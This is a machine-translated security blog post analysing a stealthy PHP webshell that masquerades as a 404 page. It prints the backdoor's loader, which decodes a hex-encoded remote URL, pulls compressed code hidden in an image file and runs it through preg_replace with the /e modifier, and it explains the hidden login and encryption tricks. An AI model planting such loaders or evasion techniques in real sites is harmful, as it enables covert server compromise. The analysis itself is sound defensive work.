PHP Backdoor New gameplay: a wretched PHP backdoor analysis

Source: Internet
Author: User
Tags crypt sprintf blank page

Recently, 360 Web site defender Security team recently captured a PHP-based implementation of the Webshell sample, its clever code dynamic generation way, wretched self-page camouflage technique, let us in the process of analyzing this sample to feel a lot of fun. Next, let's share the wonderful Webshell.

The Webshell code is as follows:

<?php
error_reporting (0);
Session_Start ();
Header ("Content-type:text/html;charset=utf-8″"), if (Empty ($_session[' API '))
$_session[' API ']=substr (file_get_contents (
sprintf ('%s?%s ', pack ("h*",
' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ()), 3649);
@preg_replace ("~ (. *) ~ies", Gzuncompress ($_session[' API '), NULL);
?>

The key to look at the following line of code,

sprintf ('%s?%s ', pack ("h*",
' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), uniqid ())

After executing here is actually a picture, the decrypted picture address is as follows:

Http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

Then call the File_get_contents function to read the picture as a string, and then substr take 3649 bytes after the content, then call Gzuncompress decompression, get the real code. Finally, the Preg_replace modifier e is called to execute the malicious code. The following statement is executed here to restore the malicious sample code.

<?php
Echo gzuncompress (substr (file_get_contents (sprintf ('%s?%s ', pack ("h*",
(687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ())), 3649));
?>

Analysis of this code, found that this is a disguised 404 Trojan (here is really too wretched ...) Change the page title to 404 Not Found), in fact, the entire Webshell a class plus three function, such as:

First I first look at its front-end HTML code, which has such a section of JS program
Document.onkeydown = function (e) {
var theevent = window.event | | E
var code = Theevent.keycode | | Theevent.which;
if (= = = Code) {
$ ("login"). Style.display = "Block"
}
}
Here it uses Document.onkeydown to get the user to hit the keyboard event, when code equals 80 display Login This div, here Query the KeyCode table, find 80 corresponding p and p key

So trigger Webshell landing need to press the P key (do not press the P key page is a blank page, do not see the login box):

Back to the server PHP code, you can see the program is symmetric encryption, and the login password as the encryption key, code:

And look at the logic of Init ().

, look at this code first

$true =

@gzuncompress (Gzuncompress (Crypt::d ecrypt (Pack (' h* ', ' 789c63ac0bbec7b494f12cdb02f6dfac3f833731cf093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59′), $_POST[' Key '], true));

According to this decryption logic we can launch, here is actually the string true to do the following encryption processing,

Unpack (' h* ', Crypt::encrypt (gzcompress (' true '), gzcompress ' key '), true))

So when the correct password is entered, @gzuncompress returns the string true, and then the program calls Setcookie to return the $_cookie[' key ' to the client, and then it is worth mentioning that this exit (' {' Status ': ' On '} '), Here it is very close to the front-end code, we look at the front end has a callback function, as follows

function callback () {
var json = eval ("(" + This.responsetext + ")");
if (json.status== ' on ') {
Window.location.reload ();
Return
}
if (Json.notice) {
$ ("notice"). Style.display = "block";
$ ("notice"). InnerHTML = Json.notice;
Sideout ();
}
}

The execution of exit (' {' "Status ': ' On '} ') returns the JSON string {" status ":" On "}, at which point the front-end JS Code classback () gets to this response performs window.location.reload () refresh, Ask again to bring the cookie that was previously obtained, and then execute the logic that determines the cookie:

This is the same as the logic of the previous post, the following when the judgment is ' true ', here again request a picture, pack out address is http://2012heike.googlecode.com/svn/trunk/code.jpg, and then call _ Request to get the picture content, decryption decompression and then eval, after analysis found that code.jpg is the real Webshell after the encryption compressed content. Here I followed the code to print out the content of the really executed Webshell:

After the successful landing Webshell such as:

Summarize:

This is a highly covert webshell, which does not use some dangerous functions and sensitive words in its code, but instead saves the real shell content after layers of encryption to the image, leaving only a URL on the server, and the URL is encrypted. So there is no external view of any features can be found, over the majority of the WAF and kill the soft Avira. The author's use of new ideas, and the front end of the combination of close, code simplification, a variety of artifice, different from the common Webshell back door, it is admirable!

PHP Backdoor New gameplay: a wretched PHP backdoor analysis

Large-Scale Price Reduction
  • 59% Max. and 23% Avg.
  • Price Reduction for Core Products
  • Price Reduction in Multiple Regions
undefined. /
Connect with us on Discord
  • Secure, anonymous group chat without disturbance
  • Stay updated on campaigns, new products, and more
  • Support for all your questions
undefined. /
Free Tier
  • Start free from ECS to Big Data
  • Get Started in 3 Simple Steps
  • Try ECS t5 1C1G
undefined. /

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.